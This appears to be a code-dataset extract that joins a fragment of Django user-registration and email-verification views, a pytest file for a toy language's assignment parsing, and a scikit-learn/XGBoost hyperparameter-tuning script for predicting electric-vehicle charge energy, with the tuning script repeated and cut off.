userprofile.is_employer = True
userprofile.receive_updates = form.cleaned_data.get('receive_updates')
userprofile.save()
token_generator = PasswordResetTokenGenerator()
token = token_generator.make_token(user)
url = self.request.build_absolute_uri(reverse('registration:email-verify', args=(user.pk, token)))
send_verification_email(user, url, self.request)
messages.info(self.request, _(f"A verification email has been sent to - {user.email}, you must verify your account before you can log in."))
return super().form_valid(form)
except:
messages.error(self.request, _("Something went wrong, please try again."))
return super().get(self.request)
class EmployerRegistrationSuccessView(TemplateView):
template_name = 'registration/employer-registration-success.html'
class EmployerResendVerificationEmailView(TemplateView):
template_name = 'registration/employer-resend-verification-email.html'
class UserEmailVerificationView(TemplateView):
template_name = 'registration/user-email-verification.html'
def get(self, request, *args, **kwargs):
self.user = User.objects.get(pk=self.kwargs.get('pk'))
token_generator = PasswordResetTokenGenerator()
url_token = self.kwargs.get('token')
self.valid = False
self.verified = False
if token_generator.check_token(self.user, url_token):
self.valid = True
if self.user.userprofile.verified:
self.verified = True
self.user.userprofile.verified = True
self.user.userprofile.save()
return super().get(request, *args, **kwargs)
class ResendVerificationEmail(FormView):
template_name = 'registration/resend-verification.html'
form_class = ResetPasswordEmailForm
success_url = reverse_lazy('login')
def form_valid(self, form):
messages.info(self.request, _(f"Verification email has been sent to - {form.cleaned_data.get('email')}, please check your inbox."))
try:
user = User.objects.get(email=form.cleaned_data.get('email'))
if not user.userprofile.verified:
token_generator = PasswordResetTokenGenerator()
token = token_generator.make_token(user)
url = self.request.build_absolute_uri(reverse('registration:email-verify', args=(user.pk, token)))
send_verification_email(user, url, self.request)
except User.DoesNotExist:
return super().form_valid(form)
return super().form_valid(form) | 0.419767 | 0.054904 |
from tests.infrastructure.test_utils import parse_local
from tests.parser.test_method_call_parsing import validate_method_call
from thinglang.lexer.values.identifier import Identifier
from thinglang.lexer.values.inline_text import InlineString
from thinglang.lexer.values.numeric import NumericValue
from thinglang.parser.statements.assignment_operation import AssignmentOperation
from thinglang.parser.values.binary_operation import BinaryOperation
from thinglang.parser.values.method_call import MethodCall
def validate_assignment(node, type, name, value):
assert isinstance(node, AssignmentOperation)
assert node.name == Identifier(name)
assert node.name.type == (Identifier(type) if type else None)
assert node.intent == (AssignmentOperation.DECELERATION if type else AssignmentOperation.REASSIGNMENT)
if value in (MethodCall, BinaryOperation):
assert isinstance(node.value, value)
def test_immediate_declarations():
validate_assignment(parse_local('number a = 5'), 'number', 'a', NumericValue(5))
validate_assignment(parse_local('text a = "hello world!"'), 'text', 'a', InlineString('hello world!'))
def test_immediate_assignments():
validate_assignment(parse_local('a = 5'), None, 'a', NumericValue(5))
validate_assignment(parse_local('a = "hello world!"'), None, 'a', InlineString('hello world!'))
def test_simple_method_call_value_type():
assignment = parse_local('number a = number.random()')
validate_assignment(assignment, 'number', 'a', MethodCall)
validate_method_call(assignment.value, ['number', 'random'], [])
def test_complex_method_call_value_type():
assignment = parse_local('number a = distribution.normal(number.random(10), number.random(25))')
validate_assignment(assignment, 'number', 'a', MethodCall)
validate_method_call(assignment.value, ['distribution', 'normal'], [[NumericValue], [NumericValue]])
def test_arithmetic_operation_value_type():
assignment = parse_local('number a = 2 * (4 + 2) * (3 + 2)')
validate_assignment(assignment, 'number', 'a', BinaryOperation)
assert assignment.value.evaluate() == 60
def test_in_place_modifier():
reassignment = parse_local('a += 2 * 8')
validate_assignment(reassignment, None, 'a', BinaryOperation)
assert reassignment.value.lhs == Identifier('a')
assert isinstance(reassignment.value.rhs, BinaryOperation)
assert reassignment.value.rhs.evaluate() == 16 | tests/parser/test_assignment_operation_parsing.py | from tests.infrastructure.test_utils import parse_local
from tests.parser.test_method_call_parsing import validate_method_call
from thinglang.lexer.values.identifier import Identifier
from thinglang.lexer.values.inline_text import InlineString
from thinglang.lexer.values.numeric import NumericValue
from thinglang.parser.statements.assignment_operation import AssignmentOperation
from thinglang.parser.values.binary_operation import BinaryOperation
from thinglang.parser.values.method_call import MethodCall
def validate_assignment(node, type, name, value):
assert isinstance(node, AssignmentOperation)
assert node.name == Identifier(name)
assert node.name.type == (Identifier(type) if type else None)
assert node.intent == (AssignmentOperation.DECELERATION if type else AssignmentOperation.REASSIGNMENT)
if value in (MethodCall, BinaryOperation):
assert isinstance(node.value, value)
def test_immediate_declarations():
validate_assignment(parse_local('number a = 5'), 'number', 'a', NumericValue(5))
validate_assignment(parse_local('text a = "hello world!"'), 'text', 'a', InlineString('hello world!'))
def test_immediate_assignments():
validate_assignment(parse_local('a = 5'), None, 'a', NumericValue(5))
validate_assignment(parse_local('a = "hello world!"'), None, 'a', InlineString('hello world!'))
def test_simple_method_call_value_type():
assignment = parse_local('number a = number.random()')
validate_assignment(assignment, 'number', 'a', MethodCall)
validate_method_call(assignment.value, ['number', 'random'], [])
def test_complex_method_call_value_type():
assignment = parse_local('number a = distribution.normal(number.random(10), number.random(25))')
validate_assignment(assignment, 'number', 'a', MethodCall)
validate_method_call(assignment.value, ['distribution', 'normal'], [[NumericValue], [NumericValue]])
def test_arithmetic_operation_value_type():
assignment = parse_local('number a = 2 * (4 + 2) * (3 + 2)')
validate_assignment(assignment, 'number', 'a', BinaryOperation)
assert assignment.value.evaluate() == 60
def test_in_place_modifier():
reassignment = parse_local('a += 2 * 8')
validate_assignment(reassignment, None, 'a', BinaryOperation)
assert reassignment.value.lhs == Identifier('a')
assert isinstance(reassignment.value.rhs, BinaryOperation)
assert reassignment.value.rhs.evaluate() == 16 | 0.73029 | 0.622201 |
import pandas as pd
import numpy as np
from sklearn import svm
from sklearn import model_selection
from sklearn.model_selection import learning_curve
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import cross_val_predict
from sklearn.linear_model import ElasticNetCV
from sklearn.model_selection import KFold
from sklearn import linear_model
import xgboost as xgb
import matplotlib.pyplot as plt
from sklearn.preprocessing import RobustScaler
from sklearn.pipeline import make_pipeline
from sklearn.linear_model import LassoCV
from sklearn.linear_model import RidgeCV
from lightgbm import LGBMRegressor
import feature_list
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=-1, train_sizes=np.linspace(.1, 1.0, 5), verbose=0):
plt.figure()
plt.title(title)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(estimator, X, y, cv=cv,
n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid()
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1, color='r')
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color='g')
plt.plot(train_sizes, train_scores_mean, 'o-', color="r", label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g", label="Cross-validation score")
plt.legend(loc="best")
return plt
def select_drop_standand(traindata, testdata, num):
# 选取特征
if num == 1:
selected, select_list = feature_list.select_feature1(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature1(testdata, False)
if num == 2:
selected, select_list = feature_list.select_feature2(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature2(testdata, False)
if num == 3:
selected, select_list = feature_list.select_feature3(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature3(testdata, False)
if num == 4:
selected, select_list = feature_list.select_feature4(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature4(testdata, False)
if num == 5:
selected, select_list = feature_list.select_feature5(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature5(testdata, False)
if num == 6:
selected, select_list = feature_list.select_feature6(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature6(testdata, False)
if num == 7:
selected, select_list = feature_list.select_feature7(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature7(testdata, False)
if num == 8:
selected, select_list = feature_list.select_feature8(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature8(testdata, False)
if num == 9:
selected, select_list = feature_list.select_feature9(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature9(testdata, False)
if num == 10:
selected, select_list = feature_list.select_feature10(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature10(testdata, False)
if num == 11:
selected, select_list = feature_list.select_feature11(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature11(testdata, False)
if num == 12:
selected, select_list = feature_list.select_feature12(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature12(testdata, False)
if num == 13:
selected, select_list = feature_list.select_feature13(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature13(testdata, False)
if num == 14:
selected, select_list = feature_list.select_feature14(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature14(testdata, False)
if num == 15:
selected, select_list = feature_list.select_feature15(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature15(testdata, False)
if num == 16:
selected, select_list = feature_list.select_feature16(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature16(testdata, False)
selected.reset_index(drop=True, inplace=True)
selected_testB_features.reset_index(drop=True, inplace=True)
# 清理空行
selected_nonan = selected.dropna(axis=0, how='any')
train_targets = pd.DataFrame(selected_nonan['charge_energy'], columns=['charge_energy'])
train_nonan_features = selected_nonan.drop(['charge_energy'], axis=1)
train_test_features = pd.concat([train_nonan_features, selected_testB_features], axis=0)
train_test_features.reset_index(drop=True, inplace=True)
# 注意标准化方法,RobustScaler quantile_range=(25.0, 75.0) # 基于分位数标准化 features
select_list.remove('charge_energy')
x_scaler = RobustScaler()
y_scaler = RobustScaler()
n_X_train_test = x_scaler.fit_transform(np.array(train_test_features))
# n_y_train = y_scaler.fit_transform(np.log1p(np.array(train_targets))) # ln(x+1)变换
n_y_train = y_scaler.fit_transform(np.array(train_targets))
n_X_train_test_pd = pd.DataFrame(n_X_train_test, columns=select_list)
n_X_train_test_mer = n_X_train_test_pd.copy()
# 时间维稀疏矩阵
# chargemode_dummies = pd.get_dummies(train_test_features['charge_mode'], prefix='mode', prefix_sep='_')
# hour_dummies = pd.get_dummies(train_test_features['hour'], prefix='hour', prefix_sep='_')
# week_dummies = pd.get_dummies(train_test_features['week'], prefix='week', prefix_sep='_')
# month_dummies = pd.get_dummies(train_test_features['month'], prefix='month', prefix_sep='_')
# if 'phase' in select_list:
# phase_dummies = pd.get_dummies(train_test_features['phase'], prefix='phase', prefix_sep='_')
# n_X_train_test_mer = pd.concat([n_X_train_test_pd, chargemode_dummies, hour_dummies, week_dummies, month_dummies,phase_dummies], axis=1)
# n_X_train_test_mer.drop(['charge_mode', 'hour', 'week', 'month', 'phase'], axis=1, inplace=True)
# else:
# n_X_train_test_mer = pd.concat([n_X_train_test_pd, chargemode_dummies, hour_dummies, week_dummies, month_dummies], axis=1)
# n_X_train_test_mer.drop(['charge_mode', 'hour', 'week', 'month'], axis=1, inplace=True)
n_testB = n_X_train_test_mer.tail(selected_testB_features.shape[0])
n_X_train = n_X_train_test_mer.drop(n_testB.index.tolist())
return n_X_train, n_y_train, n_testB, y_scaler
ram_num = 5
kfolds = KFold(n_splits=10, shuffle=True, random_state=ram_num)
def cv_rmse(model, train, y_train):
rmse = np.sqrt(-cross_val_score(model, train, y_train, scoring="neg_mean_squared_error", cv = kfolds))
return(rmse)
def ridge_selector(k, X, y):
model = make_pipeline(RidgeCV(alphas = [k], cv=kfolds)).fit(X, y)
rmse = cv_rmse(model, X, y).mean()
return(rmse)
def lasso_selector(k, X, y):
model = make_pipeline(LassoCV(max_iter=1e7, alphas = [k],
cv = kfolds)).fit(X, y)
rmse = cv_rmse(model, X, y).mean()
return(rmse)
if __name__ == '__main__':
# 分别读取16个车的数据 features + target
readFile_carfeatures = []
readFile_testfeatures = []
car_train_list = []
car_test_list = []
filenum = 17
for i in range(1,filenum):
readFile_carfeatures.append('../dataset/feature/train_feature/car' + str(i) + '_features.csv')
for i in range(1,filenum):
readFile_testfeatures.append('../dataset/feature/test_feature/car' + str(i) + 'testB_features.csv')
# train features + target
for i in range(len(readFile_carfeatures)):
car_train = pd.read_csv(readFile_carfeatures[i], dtype={'charge_start_time': str, 'charge_end_time': str})
car_train_list.append(car_train)
# test features
for i in range(len(readFile_carfeatures)):
car_test = pd.read_csv(readFile_testfeatures[i])
car_test_list.append(car_test)
car_index = 0 # 0 = car1
car_train = pd.read_csv(readFile_carfeatures[car_index], dtype={'charge_start_time': str, 'charge_end_time': str})
# 区分快慢充电
# car_train = car_train[car_train['charge_mode'].isin([0])]
# 区分电池阶段
# car_train = car_train[car_train['phase'].isin([0])]
norm_X_train, norm_y_train, norm_test, y_scal = select_drop_standand(car_train, car_test, num=car_index+1)
train_target = np.ravel(np.array(norm_y_train))
# plot_learning_curve
r_alphas_best = {'alpha': 0.0008}
title = "Learning Curves Ridge"
plot_learning_curve(linear_model.Ridge(**r_alphas_best), title, norm_X_train, train_target, cv=5)
l_alphas_best = {'alpha': 0.00001}
title = "Learning Curves Lasso"
plot_learning_curve(linear_model.Lasso(**l_alphas_best), title, norm_X_train, train_target, cv=5)
ElasticNet_pram = {'alpha': 0.0001, 'l1_ratio': 5}
title = "Learning Curves ElasticNet"
plot_learning_curve(linear_model.ElasticNet(**ElasticNet_pram), title, norm_X_train, train_target, cv=5)
gbm_param = {'n_estimators': 2000, 'max_depth': 4, 'min_samples_split': 2, 'min_samples_leaf': 2,
'max_features': 'auto', 'subsample': 0.6, 'learning_rate': 0.008}
title = "Learning Curves gbm"
plot_learning_curve(GradientBoostingRegressor(**gbm_param), title, norm_X_train, train_target, cv=5)
xgb_param = {'max_depth': 3, 'min_child_weight': 0.9, 'gamma': 0.0001, 'subsample': 0.55,
'scale_pos_weight': 1, 'learning_rate': 0.008, 'reg_alpha': 0.001,
'colsample_bytree': 0.9, 'booster': 'gbtree', 'n_estimators': 3000}
title = "Learning Curves xgb"
plot_learning_curve(xgb.XGBRegressor(**xgb_param), title, norm_X_train, train_target, cv=5)
svr_pram = {'C': 250, 'gamma': 0.001}
title = "Learning Curves SVR"
plot_learning_curve(svm.SVR(**svr_pram), title, norm_X_train, train_target, cv=5)
#### Ridge 选取最佳参数
r_alphas = [0,0.00001,0.0001,0.0008,0.001,0.005,0.1,0.4,1,10,15,20,30,40,50]
r_alphas = [0,0.00001,0.0001,0.0008,0.001,0.005,0.1,0.4,1]
ridge_scores = []
for alpha in r_alphas:
score = ridge_selector(alpha, norm_X_train, train_target)
ridge_scores.append(score)
ridge_score_table = pd.DataFrame(ridge_scores, r_alphas, columns=['Ridge_RMSE'])
print(ridge_score_table)
# 用最佳参数进行计算
r_alphas_best = [0.0008]
ridge = make_pipeline(RidgeCV(alphas = r_alphas_best, cv = kfolds))
ridge_model_score = cv_rmse(ridge, norm_X_train, train_target)
plt.plot(r_alphas, ridge_scores, label='Ridge')
plt.legend('center')
plt.xlabel('alpha')
plt.ylabel('score')
print("ridge cv score: {0:.6f}".format(ridge_model_score.mean()))
#### Lasso 选取最佳参数
l_alphas = [0.00001,0.0001,0.001,0.003,0.008,0.01,0.05,0.1,0.2]
lasso_scores = []
for alpha in l_alphas:
score = lasso_selector(alpha, norm_X_train, train_target)
lasso_scores.append(score)
lasso_score_table = pd.DataFrame(lasso_scores, l_alphas, columns=['Lasso_RMSE'])
print(lasso_score_table)
# 用最佳参数进行计算
l_alphas_best = [0.001]
lasso = make_pipeline(LassoCV(max_iter=1e7, alphas = l_alphas_best, cv = kfolds))
lasso_model_score = cv_rmse(lasso, norm_X_train, train_target)
print("Lasso cv score: {0:.6f}".format(lasso_model_score.mean()))
lasso_model2 = make_pipeline(RobustScaler(),
LassoCV(max_iter=1e7,
alphas = l_alphas,
random_state = 42)).fit(norm_X_train, train_target)
scores = lasso_model2.steps[1][1].mse_path_
plt.figure()
plt.xlabel('alpha')
plt.ylabel('RMSE')
plt.tight_layout()
plt.show()
#### 分析lasso k-fold 过拟合 特征
alphas_mse = [0.00001,0.0001,0.006,0.001,0.003,0.008,0.01,0.05,0.1,0.2,0.3,0.4,0.5]
lasso_model_mse = make_pipeline(RobustScaler(), LassoCV(max_iter=1e7, alphas = alphas_mse, cv = kfolds
)).fit(norm_X_train, train_target)
lasso_model_score = cv_rmse(lasso_model_mse, norm_X_train, train_target)
print("Lasso cv score: {0:.6f}".format(lasso_model_score.mean()))
lcv_scores = lasso_model_mse.steps[1][1].mse_path_
plt.plot(alphas_mse, lcv_scores, label='Lasso')
coeffs = pd.DataFrame(list(zip(norm_X_train.columns, lasso_model_mse.steps[1][1].coef_)), columns=['Features', 'Coefficients'])
used_coeffs = coeffs[coeffs['Coefficients'] != 0].sort_values(by='Coefficients', ascending=False)
print(used_coeffs.shape)
print(used_coeffs)
used_coeffs_values = norm_X_train[used_coeffs['Features']]
used_coeffs_values.shape
overfit_test2 = []
for i in used_coeffs_values.columns:
counts2 = used_coeffs_values[i].value_counts()
zeros2 = counts2.iloc[0]
if zeros2 / len(used_coeffs_values) * 100 > 40:
overfit_test2.append(i)
print('Overfit Features')
print(overfit_test2)
#### elastic_model
e_alphas_best = [0.0008,0.0001,0.0002,0.001,0.01,0.1,1,10,100]
e_l1ratio_best = [0.001,0.01,0.1,1,5,10,100]
elastic = make_pipeline(RobustScaler(),
ElasticNetCV(max_iter=1e5, alphas=e_alphas_best,
cv=kfolds, l1_ratio=e_l1ratio_best))
elastic_model = elastic.fit(norm_X_train, train_target)
elastic_model_score = cv_rmse(elastic_model, norm_X_train, train_target)
print("elastic cv score: {0:.6f}".format(elastic_model_score.mean()))
print(elastic_model.steps[1][1].alpha_)
print(elastic_model.steps[1][1].l1_ratio_)
#### xgb 选取最佳参数
xgb_reg = xgb.XGBRegressor()
xgb_reg_param_grid = {'max_depth': [3,4,6], 'min_child_weight': [0.9,1], 'gamma': [0.0001],'colsample_bytree': [0.9,0.8],
'subsample': [0.7,0.55], 'scale_pos_weight': [1], 'learning_rate': [0.01], 'reg_alpha': [0.001],
'booster': ['gbtree'], 'n_estimators': [3000]}
xgb_reg_param_grid = {'max_depth': [4], 'min_child_weight': [1], 'gamma': [0.0001],'colsample_bytree': [0.9],
'subsample': [0.55], 'scale_pos_weight': [1], 'learning_rate': [0.01], 'reg_alpha': [0.001],
'booster': ['gbtree'], 'n_estimators': [3000]}
xgb_reg_grid = model_selection.GridSearchCV(xgb_reg, xgb_reg_param_grid, cv=10, verbose=1, n_jobs=-1,
scoring='neg_mean_squared_error')
xgb_reg_grid.fit(norm_X_train, train_target)
print('Best XGB Params:' + str(xgb_reg_grid.best_params_))
print('Best XGB score:' + str(np.sqrt(-xgb_reg_grid.best_score_)))
feature_imp_sorted_xgb = pd.DataFrame({'feature': list(norm_X_train),
'importance': xgb_reg_grid.best_estimator_.feature_importances_}).sort_values(
'importance', ascending=False)
features_top_n_xgb = feature_imp_sorted_xgb.head(10)['feature']
xgb_feature_importance = 100.0 * (feature_imp_sorted_xgb['importance'] / feature_imp_sorted_xgb['importance'].max())
xgb_important_idx = np.where(xgb_feature_importance)[0]
posxgb = np.arange(xgb_important_idx.shape[0]) + .5
plt.barh(posxgb, np.array(xgb_feature_importance[xgb_feature_importance != 0]))
plt.yticks(posxgb, feature_imp_sorted_xgb['feature'])
plt.xlabel('Relative Importance')
plt.title('XGB Features Importance')
plt.show()
#### gbm 选取最佳参数
gbm_reg = GradientBoostingRegressor(random_state=1)
gbm_reg_param_grid = {'n_estimators': [2000,3000], 'max_depth': [3,4], 'min_samples_split': [2,10,15], 'min_samples_leaf': [2,5],
'max_features': ['auto'], 'subsample': [0.6,0.7], 'learning_rate': [0.01]}
gbm_reg_param_grid = {'n_estimators': [2000], 'max_depth': [4], 'min_samples_split': [2], 'min_samples_leaf': [2],
'max_features': ['auto'], 'subsample': [0.6], 'learning_rate': [0.01]}
gbm_reg_grid = model_selection.GridSearchCV(gbm_reg, gbm_reg_param_grid, cv=10, verbose=1, n_jobs=-1,
scoring='neg_mean_squared_error')
gbm_reg_grid.fit(norm_X_train, train_target)
print('Best gbm Params:' + str(gbm_reg_grid.best_params_))
print('Best gbm score:' + str(np.sqrt(-gbm_reg_grid.best_score_)))
feature_imp_sorted_gbm = pd.DataFrame({'feature': list(norm_X_train),
'importance': gbm_reg_grid.best_estimator_.feature_importances_}).sort_values(
'importance', ascending=False)
features_top_n_gbm = feature_imp_sorted_gbm.head(10)['feature']
gbm_feature_importance = 100.0 * (feature_imp_sorted_gbm['importance'] / feature_imp_sorted_gbm['importance'].max())
gbm_important_idx = np.where(gbm_feature_importance)[0]
posgbm = np.arange(gbm_important_idx.shape[0]) + .5
plt.figure()
plt.barh(posgbm, np.array(gbm_feature_importance[gbm_feature_importance != 0]))
plt.yticks(posgbm, feature_imp_sorted_gbm['feature'])
plt.xlabel('Relative Importance')
plt.title('GradientBoosting Feature Importance')
#### lgm 选取最佳参数
# lgm_reg = LGBMRegressor()
# lgm_reg_param_grid = {'learning_rate':[0.01], 'n_estimators':[2000],
# 'max_depth':[3], 'num_leaves':[4],
# 'max_bin':[55],
# 'feature_fraction': [0.8],'bagging_fraction':[0.9],
# 'min_data_in_leaf':[6],'min_sum_hessian_in_leaf':[0.7]}
# lgm_reg_grid = model_selection.GridSearchCV(lgm_reg, lgm_reg_param_grid, cv=10, verbose=1, n_jobs=-1,
# scoring='neg_mean_squared_error')
# lgm_reg_grid.fit(norm_X_train, train_target)
# print('Best lgm Params:' + str(lgm_reg_grid.best_params_))
# print('Best lgm score:' + str(np.sqrt(-lgm_reg_grid.best_score_)))
# feature_imp_sorted_lgm = pd.DataFrame({'feature': list(norm_X_train),
# 'importance': lgm_reg_grid.best_estimator_.feature_importances_}).sort_values(
# 'importance', ascending=False)
# features_top_n_lgm = feature_imp_sorted_lgm.head(10)['feature']
# lgm_feature_importance = 100.0 * (feature_imp_sorted_lgm['importance'] / feature_imp_sorted_lgm['importance'].max())
# lgm_important_idx = np.where(lgm_feature_importance)[0]
# poslgm = np.arange(lgm_important_idx.shape[0]) + .5
# plt.barh(poslgm, np.array(lgm_feature_importance[lgm_feature_importance != 0]))
# plt.yticks(poslgm, feature_imp_sorted_lgm['feature'])
# plt.xlabel('Relative Importance')
# plt.title('Lgbm Feature Importance')
#### svr model
svr_reg = svm.SVR()
svr_reg_param_grid = {'C':[0.1,1,10,20,40,60,70,100,200,250,300,350,400,500,1000,2000,3000,4000],
'gamma':[0.00001,0.0001,0.0003,0.0005,0.001,0.005,0.01,0.1,1,10,100,1000]}
svr_reg_grid = model_selection.GridSearchCV(svr_reg, svr_reg_param_grid, cv=10, verbose=1, n_jobs=-1,
scoring='neg_mean_squared_error')
svr_reg_grid.fit(norm_X_train, train_target)
print('Best svr Params:' + str(svr_reg_grid.best_params_))
print('Best svr score:' + str(np.sqrt(-svr_reg_grid.best_score_))) | models/tunning.py | import pandas as pd
import numpy as np
from sklearn import svm
from sklearn import model_selection
from sklearn.model_selection import learning_curve
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import cross_val_predict
from sklearn.linear_model import ElasticNetCV
from sklearn.model_selection import KFold
from sklearn import linear_model
import xgboost as xgb
import matplotlib.pyplot as plt
from sklearn.preprocessing import RobustScaler
from sklearn.pipeline import make_pipeline
from sklearn.linear_model import LassoCV
from sklearn.linear_model import RidgeCV
from lightgbm import LGBMRegressor
import feature_list
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=-1, train_sizes=np.linspace(.1, 1.0, 5), verbose=0):
plt.figure()
plt.title(title)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(estimator, X, y, cv=cv,
n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid()
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1, color='r')
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color='g')
plt.plot(train_sizes, train_scores_mean, 'o-', color="r", label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g", label="Cross-validation score")
plt.legend(loc="best")
return plt
def select_drop_standand(traindata, testdata, num):
# 选取特征
if num == 1:
selected, select_list = feature_list.select_feature1(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature1(testdata, False)
if num == 2:
selected, select_list = feature_list.select_feature2(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature2(testdata, False)
if num == 3:
selected, select_list = feature_list.select_feature3(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature3(testdata, False)
if num == 4:
selected, select_list = feature_list.select_feature4(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature4(testdata, False)
if num == 5:
selected, select_list = feature_list.select_feature5(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature5(testdata, False)
if num == 6:
selected, select_list = feature_list.select_feature6(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature6(testdata, False)
if num == 7:
selected, select_list = feature_list.select_feature7(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature7(testdata, False)
if num == 8:
selected, select_list = feature_list.select_feature8(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature8(testdata, False)
if num == 9:
selected, select_list = feature_list.select_feature9(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature9(testdata, False)
if num == 10:
selected, select_list = feature_list.select_feature10(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature10(testdata, False)
if num == 11:
selected, select_list = feature_list.select_feature11(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature11(testdata, False)
if num == 12:
selected, select_list = feature_list.select_feature12(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature12(testdata, False)
if num == 13:
selected, select_list = feature_list.select_feature13(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature13(testdata, False)
if num == 14:
selected, select_list = feature_list.select_feature14(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature14(testdata, False)
if num == 15:
selected, select_list = feature_list.select_feature15(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature15(testdata, False)
if num == 16:
selected, select_list = feature_list.select_feature16(traindata, True)
selected_testB_features, select_list_testB = feature_list.select_feature16(testdata, False)
selected.reset_index(drop=True, inplace=True)
selected_testB_features.reset_index(drop=True, inplace=True)
# 清理空行
selected_nonan = selected.dropna(axis=0, how='any')
train_targets = pd.DataFrame(selected_nonan['charge_energy'], columns=['charge_energy'])
train_nonan_features = selected_nonan.drop(['charge_energy'], axis=1)
train_test_features = pd.concat([train_nonan_features, selected_testB_features], axis=0)
train_test_features.reset_index(drop=True, inplace=True)
# 注意标准化方法,RobustScaler quantile_range=(25.0, 75.0) # 基于分位数标准化 features
select_list.remove('charge_energy')
x_scaler = RobustScaler()
y_scaler = RobustScaler()
n_X_train_test = x_scaler.fit_transform(np.array(train_test_features))
# n_y_train = y_scaler.fit_transform(np.log1p(np.array(train_targets))) # ln(x+1)变换
n_y_train = y_scaler.fit_transform(np.array(train_targets))
n_X_train_test_pd = pd.DataFrame(n_X_train_test, columns=select_list)
n_X_train_test_mer = n_X_train_test_pd.copy()
# 时间维稀疏矩阵
# chargemode_dummies = pd.get_dummies(train_test_features['charge_mode'], prefix='mode', prefix_sep='_')
# hour_dummies = pd.get_dummies(train_test_features['hour'], prefix='hour', prefix_sep='_')
# week_dummies = pd.get_dummies(train_test_features['week'], prefix='week', prefix_sep='_')
# month_dummies = pd.get_dummies(train_test_features['month'], prefix='month', prefix_sep='_')
# if 'phase' in select_list:
# phase_dummies = pd.get_dummies(train_test_features['phase'], prefix='phase', prefix_sep='_')
# n_X_train_test_mer = pd.concat([n_X_train_test_pd, chargemode_dummies, hour_dummies, week_dummies, month_dummies,phase_dummies], axis=1)
# n_X_train_test_mer.drop(['charge_mode', 'hour', 'week', 'month', 'phase'], axis=1, inplace=True)
# else:
# n_X_train_test_mer = pd.concat([n_X_train_test_pd, chargemode_dummies, hour_dummies, week_dummies, month_dummies], axis=1)
# n_X_train_test_mer.drop(['charge_mode', 'hour', 'week', 'month'], axis=1, inplace=True)
n_testB = n_X_train_test_mer.tail(selected_testB_features.shape[0])
n_X_train = n_X_train_test_mer.drop(n_testB.index.tolist())
return n_X_train, n_y_train, n_testB, y_scaler
ram_num = 5
kfolds = KFold(n_splits=10, shuffle=True, random_state=ram_num)
def cv_rmse(model, train, y_train):
rmse = np.sqrt(-cross_val_score(model, train, y_train, scoring="neg_mean_squared_error", cv = kfolds))
return(rmse)
def ridge_selector(k, X, y):
model = make_pipeline(RidgeCV(alphas = [k], cv=kfolds)).fit(X, y)
rmse = cv_rmse(model, X, y).mean()
return(rmse)
def lasso_selector(k, X, y):
model = make_pipeline(LassoCV(max_iter=1e7, alphas = [k],
cv = kfolds)).fit(X, y)
rmse = cv_rmse(model, X, y).mean()
return(rmse)
if __name__ == '__main__':
# 分别读取16个车的数据 features + target
readFile_carfeatures = []
readFile_testfeatures = []
car_train_list = []
car_test_list = []
filenum = 17
for i in range(1,filenum):
readFile_carfeatures.append('../dataset/feature/train_feature/car' + str(i) + '_features.csv')
for i in range(1,filenum):
readFile_testfeatures.append('../dataset/feature/test_feature/car' + str(i) + 'testB_features.csv')
# train features + target
for i in range(len(readFile_carfeatures)):
